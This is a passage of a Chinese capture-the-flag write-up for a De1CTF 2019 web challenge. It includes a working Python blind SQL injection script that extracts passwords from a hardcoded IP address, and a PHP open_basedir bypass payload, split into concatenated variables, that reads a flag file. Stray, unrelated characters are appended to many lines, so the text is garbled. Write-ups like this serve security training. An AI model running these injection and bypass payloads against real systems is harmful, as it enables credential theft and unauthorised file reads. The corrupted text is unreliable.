這個東西后面寫腳本是TOTP用捐韩,測試發(fā)現(xiàn)在login處存在注入退唠,測試payload:
login admin'/**/and/**/'1'='1 admin 返回login fail, password incorrect.
login admin'/**/and/**/'1'='2 admin 返回login fail, user not found.
直接寫個腳本跑就行了,這里貼glzjin師傅寫的二分法腳本荤胁。
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import pyotp as pyotp
totp = pyotp.TOTP('GAXG24JTMZXGKZBU', 8, interval=5)
def main():
get_all_databases()
def http_get(payload):
r = requests.post('http://222.85.25.41:8090/shell.php', params={'a': 'login admin\'/**/and/**/(' + payload + ')/**/and/**/\'1\'=\'1 admin', 'totp': totp.now()},
data={'dir': '/', 'pos': '/', 'filename': 'usage.md'})
print('login admin\'/**/and/**/(' + payload + ')/**/and/**/\'1\'=\'1 admin')
print(r.text)
if 'password' in r.text:
return True
else:
return False
def get_all_databases():
db_payload = "select/**/concat(password)/**/from/**/users"
db_name = ""
for y in range(1, 64):
db_name_payload = "ascii(substr((" + db_payload + "),%d,1))" % (
y)
db_name += chr(half(db_name_payload))
print("值:" + db_name)
def half(payload):
low = 0
high = 126
while low <= high:
mid = (low + high) / 2
mid_num_payload = "%s/**/>/**/%d" % (payload, mid)
if http_get(mid_num_payload):
low = mid + 1
else:
high = mid - 1
mid_num = int((low + high + 1) / 2)
return mid_num
if __name__ == '__main__':
main()
得到admin用戶的密碼為hint{G1ve_u_hi33en_C0mm3nd-sh0w_hiiintttt_23333}瞧预,所以可以登入admin用戶:
login admin hint{G1ve_u_hi33en_C0mm3nd-sh0w_hiiintttt_23333}
第二層考點:bypass open_basedir
利用targeting隨便給一些參數(shù)賦值,可以發(fā)現(xiàn)當前shell.php執(zhí)行的是php代碼仅政,所以思路就是利用php代碼來讀取flag垢油,因為賦值有長度限制,所以需要利用代碼拼接圆丹,查看phpinfo()
targeting a phpinfo
targeting b assert
targeting c {$b($a())}
返回的System Fatal Error! 也是一個坑滩愁,這竟然是執(zhí)行成功了,查看返回包就就好
可知存在open_basedir辫封,也設(shè)置了disable_function硝枉,所以要繞open_basedir來讀取其他目錄文件玖瘸,參考:https://xz.aliyun.com/t/4720 進行代碼拼接,bypass open_basedir的payload:
chdir('css');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('flag'));
已經(jīng)知道了需要跨兩層目錄檀咙,所以改寫payload為:
targeting a chdir
targeting b css
targeting c {$a($b)}
targeting d ini_set
targeting e open_basedir
targeting f ..
targeting g {$d($e,$f)}
targeting h {$a($f)}
targeting i {$a($f)}
targeting j base64_
targeting k decode
targeting l $j$k
targeting m Ly8v
targeting n {$l($m)}
targeting o {$d($e,$n)}
targeting p print_r
targeting q file_get_
targeting r contents
targeting s $q$r
targeting t flag
targeting u {$p($s($t))}
launch
0x05 9calc
直接棄了~
源碼地址:https://github.com/zsxsoft/my-ctf-challenges/tree/master/de1ctf2019/9-calc
官方wp:https://github.com/zsxsoft/my-ctf-challenges/blob/master/calcalcalc-family/3.mdh
